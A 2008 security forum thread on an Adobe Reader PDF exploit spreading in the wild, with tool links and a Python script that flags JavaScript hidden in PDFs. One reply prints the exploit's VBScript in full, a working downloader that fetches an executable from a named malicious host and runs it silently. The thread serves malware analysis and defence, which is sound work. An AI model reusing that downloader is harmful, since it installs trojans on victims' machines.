Author Topic: New pdf exploit  (Read 4849 times)


November 07, 2008, 05:43:08 pm

SysAdMini

Adobe Reader vulnerability exploited in the wild
http://isc.sans.org/diary.html?storyid=5312

Quote
at the time of writing this article, according to VirusTotal 0 (yes ZERO) AV products detected this malicious PDF.
Ruining the bad guy's day

November 10, 2008, 11:32:57 am
Reply #1

Serg

This exploit executes some VBS downloader

Code: [Select]
<script language="VBScript">
on error resume next

Function DownloadExecute(source, target)
on error resume next
Dim wobj, eobj, sobj, xobj, aobj, eloc, tfold, tfile, binstring, response, i, x

Set wobj = CreateObject("WScript.Shell")
Set sobj = CreateObject("Scripting.FileSystemObject")

If VarType(xobj) <> vbObject Then Set xobj = CreateObject("MSXML2.XMLHTTP")
If VarType(xobj) <> vbObject Then Set xobj = CreateObject("Microsoft.XMLHTTP")

If sobj.FileExists(eloc) = False Then
   xobj.Open "GET", source, False
   xobj.setRequestHeader "Request", "xpreload"
   xobj.Send
   response = xobj.responseText

   If Len(response) > 1 And InStr(LCase(binstring), "<html>") = 0 Then

        Dim ss, sn, sp, sd(), bd()
        ss = Len(response)
        sn = 5000

        sp = FormatNumber((ss / sn), 0) + 1
        ReDim sd(sp), bd(sp)

        For i = 0 To sp
           sd(i) = Mid(response, (i*sn)+1, sn)

           For x = 1 To Len(sd(i)) Step 2
           bd(i) = bd(i) & Chr(Clng("&H" & Mid(sd(i), x, 2)))
           Next

           binstring = binstring & bd(i)
        Next

   Set tfold = sobj.GetSpecialFolder(2)
   Set tfile = tfold.CreateTextFile(target)
   tfile.Write binstring
   tfile.Close

   End If
End If

wobj.run tfold & Chr(92) & target, 0
End Function
Call DownloadExecute("http://ssa.adxdnet.net/get.php?src=xpre", "xpre.exe")
</script>
 

xpre.exe is a downloader of some online-games trojans

November 11, 2008, 03:09:43 am
Reply #2

pnuemo


November 11, 2008, 04:53:05 am
Reply #3

sowhat-x

Since many people out there seem to be interested in pdf exploit variants...
http://www3.malekal.com/pdf.txt

November 11, 2008, 12:40:36 pm
Reply #4

SysAdMini


November 11, 2008, 12:52:29 pm
Reply #5

sowhat-x

In the same spirit as the article above...  ;)
http://www.757labs.com/projects/pdfresurrect/

November 11, 2008, 03:59:58 pm
Reply #6

SysAdMini

Thanks, Conrad. ;)

infonews.ath.cx, Clicksor and a nasty PDF exploit
http://www.dynamoo.com/blog/2008/11/infonewsathcx-clicksor-and-nasty-pdf.html

November 11, 2008, 06:20:14 pm
Reply #7

SysAdMini


November 11, 2008, 10:42:58 pm
Reply #8

pnuemo

I'm really enjoying all of this pdf stuff. Thanks for the links, everyone.

November 12, 2008, 02:23:51 am
Reply #9

sowhat-x

And here's a win32 'semi-hackish' port of 757labs pdfresurrect... :)
I see that Didier Stevens also provides a couple of nifty python scripts in his blog:
http://blog.didierstevens.com/programs/pdf-tools/

November 12, 2008, 05:08:21 am
Reply #10

sowhat-x


November 12, 2008, 05:58:31 am
Reply #11

sowhat-x

And another useful app to have in people's toolbox for examining pdf files...
http://ccxvii.net/fitz/
Code: [Select]
pdftool show -b (print streams as raw binary data...)
pdftool show -d (decode streams...)
pdftool clean -x (expand compressed streams...)
etc etc...

November 12, 2008, 06:51:06 pm
Reply #12

bobby

http://sourceforge.net/project/showfiles.php?group_id=203466&package_id=249639&release_id=628626

btw. the latest info.pdf-thing is not using compressed streams for hiding javascripts. It uses graphic elements of PDF document. I do not know any tool that will extract these. You need to do a manual dissection (any text editor will do the job) and convert the data from Hex (ASCII codes) to Text, and/or from Unicode sequence to shellcode.
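As an added example (not a tool from this thread or from Malzilla), a small Python triage script that covers both hiding places discussed above: it inflates FlateDecode streams the way `pdftool clean -x` does, and it decodes PDF hex strings like the graphic-element data bobby describes, then flags JavaScript markers in whichever layer they surface. The PDF bytes are a constructed stand-in, not a real sample.

```python
import re
import zlib

# Constructed sample (not a real malicious file): a FlateDecode stream with a /JS
# entry, plus a hex string inside a page-content stream hiding a JavaScript call.
HIDDEN_JS = b'eval(unescape("%u4141%u4242"))'
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Filter /FlateDecode >> stream\n"
    + zlib.compress(b"/JS (app.alert(1))") + b"\nendstream endobj\n"
    b"2 0 obj << /Type /XObject /Subtype /Form >> stream\n"
    b"BT /F1 12 Tf <" + HIDDEN_JS.hex().encode() + b"> Tj ET\nendstream endobj\n"
    b"3 0 obj << /Type /Page >> endobj\n%%EOF\n"
)

# Markers that a document-only PDF has no business containing; any hit merits a closer look.
JS_MARKERS = (b"/JS", b"/JavaScript", b"unescape(", b"eval(", b"%u")


def inflate_streams(data):
    """Return the decompressed body of every FlateDecode stream (what 'pdftool clean -x' exposes)."""
    bodies = []
    for m in re.finditer(rb"/FlateDecode.*?stream\r?\n(.*?)\r?\nendstream", data, re.S):
        try:
            bodies.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # truncated or deliberately corrupted stream: skip it rather than abort triage
    return bodies


def decode_hex_strings(data):
    """Decode PDF hex strings <...>; a trailing odd nibble is padded with 0 per the PDF spec."""
    decoded = []
    for m in re.finditer(rb"(?<!<)<([0-9A-Fa-f\s]{8,})>", data):
        digits = re.sub(rb"\s", b"", m.group(1))
        if len(digits) % 2:
            digits += b"0"
        decoded.append(bytes.fromhex(digits.decode("ascii")))
    return decoded


def find_javascript(data):
    """Return (layer, marker) pairs for markers found raw, in inflated streams, or in hex strings."""
    layers = [("raw", data)]
    layers += [("flate", body) for body in inflate_streams(data)]
    layers += [("hexstring", text) for text in decode_hex_strings(data)]
    return [(layer, marker.decode()) for layer, blob in layers
            for marker in JS_MARKERS if marker in blob]


if __name__ == "__main__":
    for layer, marker in find_javascript(SAMPLE_PDF):
        print(f"{layer:10} {marker}")
```

Real samples also use other filters (ASCIIHexDecode, LZW) and split hex data across several objects, so treat this as the first pass before a manual dissection, not a replacement for it.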

November 14, 2008, 02:49:57 am
Reply #13

cjeremy

Bobby, do you have a sample of these new pdf files? I would like to examine them if you do.